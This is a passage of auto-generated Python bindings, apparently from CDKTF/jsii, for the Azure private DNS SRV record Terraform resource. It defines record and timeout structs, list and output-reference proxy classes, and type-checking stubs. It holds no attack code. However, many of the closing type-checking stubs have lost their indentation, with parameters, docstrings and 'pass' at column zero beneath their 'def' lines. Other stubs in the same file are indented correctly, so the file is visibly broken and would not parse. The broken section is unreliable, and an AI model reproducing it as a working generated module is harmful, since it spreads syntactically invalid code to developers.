        :param target: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#target PrivateDnsSrvRecord#target}.
        :param weight: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#weight PrivateDnsSrvRecord#weight}.
        '''
        if __debug__:
            # Validate argument types against the generated stub signature.
            type_hints = typing.get_type_hints(_typecheckingstub__4d8a667e77494c343d5678d6474f7bb0bd136821aed3ef4451ed78c87e84dcba)
            check_type(argname="argument port", value=port, expected_type=type_hints["port"])
            check_type(argname="argument priority", value=priority, expected_type=type_hints["priority"])
            check_type(argname="argument target", value=target, expected_type=type_hints["target"])
            check_type(argname="argument weight", value=weight, expected_type=type_hints["weight"])
        # All four attributes are required, so each one is always stored.
        self._values: typing.Dict[builtins.str, typing.Any] = dict(
            port=port,
            priority=priority,
            target=target,
            weight=weight,
        )

    @builtins.property
    def port(self) -> jsii.Number:
        '''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#port PrivateDnsSrvRecord#port}.'''
        value = self._values.get("port")
        assert value is not None, "Required property 'port' is missing"
        return typing.cast(jsii.Number, value)

    @builtins.property
    def priority(self) -> jsii.Number:
        '''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#priority PrivateDnsSrvRecord#priority}.'''
        value = self._values.get("priority")
        assert value is not None, "Required property 'priority' is missing"
        return typing.cast(jsii.Number, value)

    @builtins.property
    def target(self) -> builtins.str:
        '''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#target PrivateDnsSrvRecord#target}.'''
        value = self._values.get("target")
        assert value is not None, "Required property 'target' is missing"
        return typing.cast(builtins.str, value)

    @builtins.property
    def weight(self) -> jsii.Number:
        '''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#weight PrivateDnsSrvRecord#weight}.'''
        value = self._values.get("weight")
        assert value is not None, "Required property 'weight' is missing"
        return typing.cast(jsii.Number, value)

    def __eq__(self, rhs: typing.Any) -> builtins.bool:
        '''Equal when the other object has the same class and the same stored values.'''
        if not isinstance(rhs, self.__class__):
            return False
        return rhs._values == self._values

    def __ne__(self, rhs: typing.Any) -> builtins.bool:
        '''Inverse of equality; delegates to ``rhs == self``.'''
        return not (rhs == self)

    def __repr__(self) -> str:
        '''Debug representation listing every stored key=value pair.'''
        fields = ", ".join(k + "=" + repr(v) for k, v in self._values.items())
        return "PrivateDnsSrvRecordRecord(%s)" % fields
class PrivateDnsSrvRecordRecordList(
    _cdktf_9a9027ec.ComplexList,
    metaclass=jsii.JSIIMeta,
    jsii_type="@cdktf/provider-azurerm.privateDnsSrvRecord.PrivateDnsSrvRecordRecordList",
):
    '''jsii proxy over the list of ``record`` blocks of a PrivateDnsSrvRecord resource.'''
    def __init__(
        self,
        terraform_resource: _cdktf_9a9027ec.IInterpolatingParent,
        terraform_attribute: builtins.str,
        wraps_set: builtins.bool,
    ) -> None:
        '''
        :param terraform_resource: The parent resource.
        :param terraform_attribute: The attribute on the parent resource this class is referencing.
        :param wraps_set: whether the list is wrapping a set (will add tolist() to be able to access an item via an index).
        '''
        if __debug__:
            # Validate argument types against the generated stub signature.
            type_hints = typing.get_type_hints(_typecheckingstub__e89f47f0bb2cbe75f9a6ed361f7566803e287b63bff302d8ef26eb743be5b2ba)
            check_type(argname="argument terraform_resource", value=terraform_resource, expected_type=type_hints["terraform_resource"])
            check_type(argname="argument terraform_attribute", value=terraform_attribute, expected_type=type_hints["terraform_attribute"])
            check_type(argname="argument wraps_set", value=wraps_set, expected_type=type_hints["wraps_set"])
        # Construct the backing object in the jsii kernel.
        jsii.create(self.__class__, self, [terraform_resource, terraform_attribute, wraps_set])
    @jsii.member(jsii_name="get")
    def get(self, index: jsii.Number) -> "PrivateDnsSrvRecordRecordOutputReference":
        '''
        :param index: the index of the item to return.
        '''
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__c2f1f687800e6044c6e4b7ad1f9d433b238c8f2427f64fb30f2e58887a08cd17)
            check_type(argname="argument index", value=index, expected_type=type_hints["index"])
        # Delegates to the jsii "get" member; returns a per-item output reference.
        return typing.cast("PrivateDnsSrvRecordRecordOutputReference", jsii.invoke(self, "get", [index]))
    @builtins.property
    @jsii.member(jsii_name="terraformAttribute")
    def _terraform_attribute(self) -> builtins.str:
        '''The attribute on the parent resource this class is referencing.'''
        return typing.cast(builtins.str, jsii.get(self, "terraformAttribute"))
    @_terraform_attribute.setter
    def _terraform_attribute(self, value: builtins.str) -> None:
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__ffeae467d9ebabdbdc7aea6bc40010a0cffa849eabf29d495bf383aadd197a1f)
            check_type(argname="argument value", value=value, expected_type=type_hints["value"])
        jsii.set(self, "terraformAttribute", value)
    @builtins.property
    @jsii.member(jsii_name="terraformResource")
    def _terraform_resource(self) -> _cdktf_9a9027ec.IInterpolatingParent:
        '''The parent resource.'''
        return typing.cast(_cdktf_9a9027ec.IInterpolatingParent, jsii.get(self, "terraformResource"))
    @_terraform_resource.setter
    def _terraform_resource(self, value: _cdktf_9a9027ec.IInterpolatingParent) -> None:
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__912ffcbadc7002a828ee2f8238a844005fbec384d31975995d00725c1dc68e20)
            check_type(argname="argument value", value=value, expected_type=type_hints["value"])
        jsii.set(self, "terraformResource", value)
    @builtins.property
    @jsii.member(jsii_name="wrapsSet")
    def _wraps_set(self) -> builtins.bool:
        '''whether the list is wrapping a set (will add tolist() to be able to access an item via an index).'''
        return typing.cast(builtins.bool, jsii.get(self, "wrapsSet"))
    @_wraps_set.setter
    def _wraps_set(self, value: builtins.bool) -> None:
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__4e4247ceb672f8669f5ceedb986f44a697976b39c0bab53801f30a8f21e92324)
            check_type(argname="argument value", value=value, expected_type=type_hints["value"])
        jsii.set(self, "wrapsSet", value)
    @builtins.property
    @jsii.member(jsii_name="internalValue")
    def internal_value(
        self,
    ) -> typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, typing.List[PrivateDnsSrvRecordRecord]]]:
        '''The raw value backing this list (an IResolvable token or concrete record structs).'''
        return typing.cast(typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, typing.List[PrivateDnsSrvRecordRecord]]], jsii.get(self, "internalValue"))
    @internal_value.setter
    def internal_value(
        self,
        value: typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, typing.List[PrivateDnsSrvRecordRecord]]],
    ) -> None:
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__aea328d42c912241adc8e92da65030e2e45ba9281409430764d363df0eb8920c)
            check_type(argname="argument value", value=value, expected_type=type_hints["value"])
        jsii.set(self, "internalValue", value)
class PrivateDnsSrvRecordRecordOutputReference(
    _cdktf_9a9027ec.ComplexObject,
    metaclass=jsii.JSIIMeta,
    jsii_type="@cdktf/provider-azurerm.privateDnsSrvRecord.PrivateDnsSrvRecordRecordOutputReference",
):
    '''jsii proxy for one ``record`` block of a PrivateDnsSrvRecord resource.'''
    def __init__(
        self,
        terraform_resource: _cdktf_9a9027ec.IInterpolatingParent,
        terraform_attribute: builtins.str,
        complex_object_index: jsii.Number,
        complex_object_is_from_set: builtins.bool,
    ) -> None:
        '''
        :param terraform_resource: The parent resource.
        :param terraform_attribute: The attribute on the parent resource this class is referencing.
        :param complex_object_index: the index of this item in the list.
        :param complex_object_is_from_set: whether the list is wrapping a set (will add tolist() to be able to access an item via an index).
        '''
        if __debug__:
            # Validate argument types against the generated stub signature.
            type_hints = typing.get_type_hints(_typecheckingstub__eb01a9a53daa586676186a4d734bea38bd257ebaa81da1901024373e6b4c3200)
            check_type(argname="argument terraform_resource", value=terraform_resource, expected_type=type_hints["terraform_resource"])
            check_type(argname="argument terraform_attribute", value=terraform_attribute, expected_type=type_hints["terraform_attribute"])
            check_type(argname="argument complex_object_index", value=complex_object_index, expected_type=type_hints["complex_object_index"])
            check_type(argname="argument complex_object_is_from_set", value=complex_object_is_from_set, expected_type=type_hints["complex_object_is_from_set"])
        # Construct the backing object in the jsii kernel.
        jsii.create(self.__class__, self, [terraform_resource, terraform_attribute, complex_object_index, complex_object_is_from_set])
    @builtins.property
    @jsii.member(jsii_name="portInput")
    def port_input(self) -> typing.Optional[jsii.Number]:
        '''Value of the ``portInput`` attribute on the jsii object, if set.'''
        return typing.cast(typing.Optional[jsii.Number], jsii.get(self, "portInput"))
    @builtins.property
    @jsii.member(jsii_name="priorityInput")
    def priority_input(self) -> typing.Optional[jsii.Number]:
        '''Value of the ``priorityInput`` attribute on the jsii object, if set.'''
        return typing.cast(typing.Optional[jsii.Number], jsii.get(self, "priorityInput"))
    @builtins.property
    @jsii.member(jsii_name="targetInput")
    def target_input(self) -> typing.Optional[builtins.str]:
        '''Value of the ``targetInput`` attribute on the jsii object, if set.'''
        return typing.cast(typing.Optional[builtins.str], jsii.get(self, "targetInput"))
    @builtins.property
    @jsii.member(jsii_name="weightInput")
    def weight_input(self) -> typing.Optional[jsii.Number]:
        '''Value of the ``weightInput`` attribute on the jsii object, if set.'''
        return typing.cast(typing.Optional[jsii.Number], jsii.get(self, "weightInput"))
    @builtins.property
    @jsii.member(jsii_name="port")
    def port(self) -> jsii.Number:
        '''The ``port`` attribute, read from the jsii object.'''
        return typing.cast(jsii.Number, jsii.get(self, "port"))
    @port.setter
    def port(self, value: jsii.Number) -> None:
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__615f905fa81317027630c677c04a430f49d3ccb884838091bba8eaa4a572f148)
            check_type(argname="argument value", value=value, expected_type=type_hints["value"])
        jsii.set(self, "port", value)
    @builtins.property
    @jsii.member(jsii_name="priority")
    def priority(self) -> jsii.Number:
        '''The ``priority`` attribute, read from the jsii object.'''
        return typing.cast(jsii.Number, jsii.get(self, "priority"))
    @priority.setter
    def priority(self, value: jsii.Number) -> None:
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__b5333e5d37824dd83ad13f7fd27eb5dc6f4155b5d49deac80d1900771d8c1f29)
            check_type(argname="argument value", value=value, expected_type=type_hints["value"])
        jsii.set(self, "priority", value)
    @builtins.property
    @jsii.member(jsii_name="target")
    def target(self) -> builtins.str:
        '''The ``target`` attribute, read from the jsii object.'''
        return typing.cast(builtins.str, jsii.get(self, "target"))
    @target.setter
    def target(self, value: builtins.str) -> None:
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__2cf9aff74f26ab9da9452f61165757960258f7f6f9b50cc2cdc11d1b1464f5cc)
            check_type(argname="argument value", value=value, expected_type=type_hints["value"])
        jsii.set(self, "target", value)
    @builtins.property
    @jsii.member(jsii_name="weight")
    def weight(self) -> jsii.Number:
        '''The ``weight`` attribute, read from the jsii object.'''
        return typing.cast(jsii.Number, jsii.get(self, "weight"))
    @weight.setter
    def weight(self, value: jsii.Number) -> None:
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__6987e824530388baf3786bb836a1f20c8ab5055b1162b6f38ffb6804f8b38b14)
            check_type(argname="argument value", value=value, expected_type=type_hints["value"])
        jsii.set(self, "weight", value)
    @builtins.property
    @jsii.member(jsii_name="internalValue")
    def internal_value(
        self,
    ) -> typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, PrivateDnsSrvRecordRecord]]:
        '''The raw value backing this reference (an IResolvable token or a record struct).'''
        return typing.cast(typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, PrivateDnsSrvRecordRecord]], jsii.get(self, "internalValue"))
    @internal_value.setter
    def internal_value(
        self,
        value: typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, PrivateDnsSrvRecordRecord]],
    ) -> None:
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__7f38aabceaa05bbf1f35e5b33a0d1a91a5131239a3769073bb2707dee77fc380)
            check_type(argname="argument value", value=value, expected_type=type_hints["value"])
        jsii.set(self, "internalValue", value)
@jsii.data_type(
    jsii_type="@cdktf/provider-azurerm.privateDnsSrvRecord.PrivateDnsSrvRecordTimeouts",
    jsii_struct_bases=[],
    name_mapping={
        "create": "create",
        "delete": "delete",
        "read": "read",
        "update": "update",
    },
)
class PrivateDnsSrvRecordTimeouts:
    '''Optional per-operation timeouts for the resource.'''

    def __init__(
        self,
        *,
        create: typing.Optional[builtins.str] = None,
        delete: typing.Optional[builtins.str] = None,
        read: typing.Optional[builtins.str] = None,
        update: typing.Optional[builtins.str] = None,
    ) -> None:
        '''
        :param create: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#create PrivateDnsSrvRecord#create}.
        :param delete: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#delete PrivateDnsSrvRecord#delete}.
        :param read: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#read PrivateDnsSrvRecord#read}.
        :param update: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#update PrivateDnsSrvRecord#update}.
        '''
        if __debug__:
            # Validate argument types against the generated stub signature.
            type_hints = typing.get_type_hints(_typecheckingstub__87d040f7678d8ecf747002a99b4fc39453f52b07258d994977ec39ec8d74404a)
            check_type(argname="argument create", value=create, expected_type=type_hints["create"])
            check_type(argname="argument delete", value=delete, expected_type=type_hints["delete"])
            check_type(argname="argument read", value=read, expected_type=type_hints["read"])
            check_type(argname="argument update", value=update, expected_type=type_hints["update"])
        # Record only the timeouts that were explicitly provided.
        self._values: typing.Dict[builtins.str, typing.Any] = {}
        for key, arg in (("create", create), ("delete", delete), ("read", read), ("update", update)):
            if arg is not None:
                self._values[key] = arg

    @builtins.property
    def create(self) -> typing.Optional[builtins.str]:
        '''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#create PrivateDnsSrvRecord#create}.'''
        return typing.cast(typing.Optional[builtins.str], self._values.get("create"))

    @builtins.property
    def delete(self) -> typing.Optional[builtins.str]:
        '''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#delete PrivateDnsSrvRecord#delete}.'''
        return typing.cast(typing.Optional[builtins.str], self._values.get("delete"))

    @builtins.property
    def read(self) -> typing.Optional[builtins.str]:
        '''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#read PrivateDnsSrvRecord#read}.'''
        return typing.cast(typing.Optional[builtins.str], self._values.get("read"))

    @builtins.property
    def update(self) -> typing.Optional[builtins.str]:
        '''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#update PrivateDnsSrvRecord#update}.'''
        return typing.cast(typing.Optional[builtins.str], self._values.get("update"))

    def __eq__(self, rhs: typing.Any) -> builtins.bool:
        '''Equal when the other object has the same class and the same stored values.'''
        if not isinstance(rhs, self.__class__):
            return False
        return rhs._values == self._values

    def __ne__(self, rhs: typing.Any) -> builtins.bool:
        '''Inverse of equality; delegates to ``rhs == self``.'''
        return not (rhs == self)

    def __repr__(self) -> str:
        '''Debug representation listing every stored key=value pair.'''
        fields = ", ".join(k + "=" + repr(v) for k, v in self._values.items())
        return "PrivateDnsSrvRecordTimeouts(%s)" % fields
class PrivateDnsSrvRecordTimeoutsOutputReference(
    _cdktf_9a9027ec.ComplexObject,
    metaclass=jsii.JSIIMeta,
    jsii_type="@cdktf/provider-azurerm.privateDnsSrvRecord.PrivateDnsSrvRecordTimeoutsOutputReference",
):
    '''jsii proxy for the ``timeouts`` block of a PrivateDnsSrvRecord resource.'''
    def __init__(
        self,
        terraform_resource: _cdktf_9a9027ec.IInterpolatingParent,
        terraform_attribute: builtins.str,
    ) -> None:
        '''
        :param terraform_resource: The parent resource.
        :param terraform_attribute: The attribute on the parent resource this class is referencing.
        '''
        if __debug__:
            # Validate argument types against the generated stub signature.
            type_hints = typing.get_type_hints(_typecheckingstub__257b4267b536b6a5d1f74c438f324e6dbc44481b0e74180ddfd5c8320244dfa6)
            check_type(argname="argument terraform_resource", value=terraform_resource, expected_type=type_hints["terraform_resource"])
            check_type(argname="argument terraform_attribute", value=terraform_attribute, expected_type=type_hints["terraform_attribute"])
        # Construct the backing object in the jsii kernel.
        jsii.create(self.__class__, self, [terraform_resource, terraform_attribute])
    @jsii.member(jsii_name="resetCreate")
    def reset_create(self) -> None:
        '''Clear the ``create`` timeout (delegates to the jsii ``resetCreate`` member).'''
        return typing.cast(None, jsii.invoke(self, "resetCreate", []))
    @jsii.member(jsii_name="resetDelete")
    def reset_delete(self) -> None:
        '''Clear the ``delete`` timeout (delegates to the jsii ``resetDelete`` member).'''
        return typing.cast(None, jsii.invoke(self, "resetDelete", []))
    @jsii.member(jsii_name="resetRead")
    def reset_read(self) -> None:
        '''Clear the ``read`` timeout (delegates to the jsii ``resetRead`` member).'''
        return typing.cast(None, jsii.invoke(self, "resetRead", []))
    @jsii.member(jsii_name="resetUpdate")
    def reset_update(self) -> None:
        '''Clear the ``update`` timeout (delegates to the jsii ``resetUpdate`` member).'''
        return typing.cast(None, jsii.invoke(self, "resetUpdate", []))
    @builtins.property
    @jsii.member(jsii_name="createInput")
    def create_input(self) -> typing.Optional[builtins.str]:
        '''Value of the ``createInput`` attribute on the jsii object, if set.'''
        return typing.cast(typing.Optional[builtins.str], jsii.get(self, "createInput"))
    @builtins.property
    @jsii.member(jsii_name="deleteInput")
    def delete_input(self) -> typing.Optional[builtins.str]:
        '''Value of the ``deleteInput`` attribute on the jsii object, if set.'''
        return typing.cast(typing.Optional[builtins.str], jsii.get(self, "deleteInput"))
    @builtins.property
    @jsii.member(jsii_name="readInput")
    def read_input(self) -> typing.Optional[builtins.str]:
        '''Value of the ``readInput`` attribute on the jsii object, if set.'''
        return typing.cast(typing.Optional[builtins.str], jsii.get(self, "readInput"))
    @builtins.property
    @jsii.member(jsii_name="updateInput")
    def update_input(self) -> typing.Optional[builtins.str]:
        '''Value of the ``updateInput`` attribute on the jsii object, if set.'''
        return typing.cast(typing.Optional[builtins.str], jsii.get(self, "updateInput"))
    @builtins.property
    @jsii.member(jsii_name="create")
    def create(self) -> builtins.str:
        '''The ``create`` timeout, read from the jsii object.'''
        return typing.cast(builtins.str, jsii.get(self, "create"))
    @create.setter
    def create(self, value: builtins.str) -> None:
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__0ef4eceb0778e45fdae434eed891e21283bc1e8c46cd7930766ebfde9e572700)
            check_type(argname="argument value", value=value, expected_type=type_hints["value"])
        jsii.set(self, "create", value)
    @builtins.property
    @jsii.member(jsii_name="delete")
    def delete(self) -> builtins.str:
        '''The ``delete`` timeout, read from the jsii object.'''
        return typing.cast(builtins.str, jsii.get(self, "delete"))
    @delete.setter
    def delete(self, value: builtins.str) -> None:
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__ed8b59d5dbb9e882fe23132d2c7e972d43f5a359d4b8457dfa6c21e61d765789)
            check_type(argname="argument value", value=value, expected_type=type_hints["value"])
        jsii.set(self, "delete", value)
    @builtins.property
    @jsii.member(jsii_name="read")
    def read(self) -> builtins.str:
        '''The ``read`` timeout, read from the jsii object.'''
        return typing.cast(builtins.str, jsii.get(self, "read"))
    @read.setter
    def read(self, value: builtins.str) -> None:
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__45bdfde5e460a19bec6ffff65f82981de5cda8db2d0eee3a6abd99cb38525a89)
            check_type(argname="argument value", value=value, expected_type=type_hints["value"])
        jsii.set(self, "read", value)
    @builtins.property
    @jsii.member(jsii_name="update")
    def update(self) -> builtins.str:
        '''The ``update`` timeout, read from the jsii object.'''
        return typing.cast(builtins.str, jsii.get(self, "update"))
    @update.setter
    def update(self, value: builtins.str) -> None:
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__a646989dbb801f28a47229a84b85b1c968d6ce35aa04707f5663ce01f12fe4e6)
            check_type(argname="argument value", value=value, expected_type=type_hints["value"])
        jsii.set(self, "update", value)
    @builtins.property
    @jsii.member(jsii_name="internalValue")
    def internal_value(
        self,
    ) -> typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, PrivateDnsSrvRecordTimeouts]]:
        '''The raw value backing this reference (an IResolvable token or a timeouts struct).'''
        return typing.cast(typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, PrivateDnsSrvRecordTimeouts]], jsii.get(self, "internalValue"))
    @internal_value.setter
    def internal_value(
        self,
        value: typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, PrivateDnsSrvRecordTimeouts]],
    ) -> None:
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__2141e235efa9d5afbbb2cffacb1f82d767f055d8247ae2c50059932b9acb4f3f)
            check_type(argname="argument value", value=value, expected_type=type_hints["value"])
        jsii.set(self, "internalValue", value)
# Public API of this generated module.
__all__ = [
    "PrivateDnsSrvRecord",
    "PrivateDnsSrvRecordConfig",
    "PrivateDnsSrvRecordRecord",
    "PrivateDnsSrvRecordRecordList",
    "PrivateDnsSrvRecordRecordOutputReference",
    "PrivateDnsSrvRecordTimeouts",
    "PrivateDnsSrvRecordTimeoutsOutputReference",
]
# NOTE(review): `publication.publish()` is the jsii codegen's module-finalization
# hook; its exact effect is defined in the `publication` package — confirm there.
publication.publish()
def _typecheckingstub__9fb1f1e98de1ef34a625d65c8f3eea9644cc513e083b9986d0a77faa13946b81(
    scope: _constructs_77d1e7e8.Construct,
    id_: builtins.str,
    *,
    name: builtins.str,
    record: typing.Union[_cdktf_9a9027ec.IResolvable, typing.Sequence[typing.Union[PrivateDnsSrvRecordRecord, typing.Dict[builtins.str, typing.Any]]]],
    resource_group_name: builtins.str,
    ttl: jsii.Number,
    zone_name: builtins.str,
    id: typing.Optional[builtins.str] = None,
    tags: typing.Optional[typing.Mapping[builtins.str, builtins.str]] = None,
    timeouts: typing.Optional[typing.Union[PrivateDnsSrvRecordTimeouts, typing.Dict[builtins.str, typing.Any]]] = None,
    connection: typing.Optional[typing.Union[typing.Union[_cdktf_9a9027ec.SSHProvisionerConnection, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.WinrmProvisionerConnection, typing.Dict[builtins.str, typing.Any]]]] = None,
    count: typing.Optional[typing.Union[jsii.Number, _cdktf_9a9027ec.TerraformCount]] = None,
    depends_on: typing.Optional[typing.Sequence[_cdktf_9a9027ec.ITerraformDependable]] = None,
    for_each: typing.Optional[_cdktf_9a9027ec.ITerraformIterator] = None,
    lifecycle: typing.Optional[typing.Union[_cdktf_9a9027ec.TerraformResourceLifecycle, typing.Dict[builtins.str, typing.Any]]] = None,
    provider: typing.Optional[_cdktf_9a9027ec.TerraformProvider] = None,
    provisioners: typing.Optional[typing.Sequence[typing.Union[typing.Union[_cdktf_9a9027ec.FileProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.LocalExecProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.RemoteExecProvisioner, typing.Dict[builtins.str, typing.Any]]]]] = None,
) -> None:
    """Type-checking stub: signature only, no runtime behavior."""
def _typecheckingstub__3446cdab40dde4b63f2981030819ea9139ec130a78d892342bc655a4b042f787(
    value: typing.Union[_cdktf_9a9027ec.IResolvable, typing.Sequence[typing.Union[PrivateDnsSrvRecordRecord, typing.Dict[builtins.str, typing.Any]]]],
) -> None:
    """Type-checking stub: signature only, no runtime behavior."""
def _typecheckingstub__28077eb04d7bb831db97de19877063bc0a999bf6b52e0aee568c8af46a5b07b0(
value: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__89537ab7de0e19eeb9b414bb4e7d2653bf427cca6ba3a133ef9dae2b5c515f76(
value: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__10431d6b61873cfd9f69121ea484514edfb955d74a54403fd37f6f9c04206925(
value: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__09e59969cdfaeee04bee49b9bac92f2b9312bc265413607b8b3b422291b8bb96(
value: typing.Mapping[builtins.str, builtins.str],
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__386b88e0b5003615ad7be07742b24369d9154bddd8cab1432bbf663646b16017(
    value: jsii.Number,
) -> None:
    """Type-checking stub: signature only, no runtime behavior."""
def _typecheckingstub__f1b8337fbac54d363e17fa332d7e7ce3d53c5de29bd61e998375788cff5645b0(
value: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__37d28774e61198a32450196eeddf0acf6401d5b3aa85494d27b805561522c56c(
    *,
    connection: typing.Optional[typing.Union[typing.Union[_cdktf_9a9027ec.SSHProvisionerConnection, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.WinrmProvisionerConnection, typing.Dict[builtins.str, typing.Any]]]] = None,
    count: typing.Optional[typing.Union[jsii.Number, _cdktf_9a9027ec.TerraformCount]] = None,
    depends_on: typing.Optional[typing.Sequence[_cdktf_9a9027ec.ITerraformDependable]] = None,
    for_each: typing.Optional[_cdktf_9a9027ec.ITerraformIterator] = None,
    lifecycle: typing.Optional[typing.Union[_cdktf_9a9027ec.TerraformResourceLifecycle, typing.Dict[builtins.str, typing.Any]]] = None,
    provider: typing.Optional[_cdktf_9a9027ec.TerraformProvider] = None,
    provisioners: typing.Optional[typing.Sequence[typing.Union[typing.Union[_cdktf_9a9027ec.FileProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.LocalExecProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.RemoteExecProvisioner, typing.Dict[builtins.str, typing.Any]]]]] = None,
    name: builtins.str,
    record: typing.Union[_cdktf_9a9027ec.IResolvable, typing.Sequence[typing.Union[PrivateDnsSrvRecordRecord, typing.Dict[builtins.str, typing.Any]]]],
    resource_group_name: builtins.str,
    ttl: jsii.Number,
    zone_name: builtins.str,
    id: typing.Optional[builtins.str] = None,
    tags: typing.Optional[typing.Mapping[builtins.str, builtins.str]] = None,
    timeouts: typing.Optional[typing.Union[PrivateDnsSrvRecordTimeouts, typing.Dict[builtins.str, typing.Any]]] = None,
) -> None:
    """Type-checking stub: signature only, no runtime behavior."""
def _typecheckingstub__4d8a667e77494c343d5678d6474f7bb0bd136821aed3ef4451ed78c87e84dcba(
*,
port: jsii.Number,
priority: jsii.Number,
target: builtins.str,
weight: jsii.Number,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__e89f47f0bb2cbe75f9a6ed361f7566803e287b63bff302d8ef26eb743be5b2ba(
terraform_resource: _cdktf_9a9027ec.IInterpolatingParent,
terraform_attribute: builtins.str,
wraps_set: builtins.bool,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__c2f1f687800e6044c6e4b7ad1f9d433b238c8f2427f64fb30f2e58887a08cd17(
index: jsii.Number,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__ffeae467d9ebabdbdc7aea6bc40010a0cffa849eabf29d495bf383aadd197a1f(
value: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__912ffcbadc7002a828ee2f8238a844005fbec384d31975995d00725c1dc68e20(
value: _cdktf_9a9027ec.IInterpolatingParent,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__4e4247ceb672f8669f5ceedb986f44a697976b39c0bab53801f30a8f21e92324(
value: builtins.bool,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__aea328d42c912241adc8e92da65030e2e45ba9281409430764d363df0eb8920c(
value: typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, typing.List[PrivateDnsSrvRecordRecord]]],
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__eb01a9a53daa586676186a4d734bea38bd257ebaa81da1901024373e6b4c3200(
terraform_resource: _cdktf_9a9027ec.IInterpolatingParent,
terraform_attribute: builtins.str,
complex_object_index: jsii.Number,
complex_object_is_from_set: builtins.bool,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__615f905fa81317027630c677c04a430f49d3ccb884838091bba8eaa4a572f148(
value: jsii.Number,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__b5333e5d37824dd83ad13f7fd27eb5dc6f4155b5d49deac80d1900771d8c1f29(
value: jsii.Number,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__2cf9aff74f26ab9da9452f61165757960258f7f6f9b50cc2cdc11d1b1464f5cc(
value: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__6987e824530388baf3786bb836a1f20c8ab5055b1162b6f38ffb6804f8b38b14(
value: jsii.Number,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__7f38aabceaa05bbf1f35e5b33a0d1a91a5131239a3769073bb2707dee77fc380(
value: typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, PrivateDnsSrvRecordRecord]],
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__87d040f7678d8ecf747002a99b4fc39453f52b07258d994977ec39ec8d74404a(
*,
create: typing.Optional[builtins.str] = None,
delete: typing.Optional[builtins.str] = None,
read: typing.Optional[builtins.str] = None,
update: typing.Optional[builtins.str] = None,
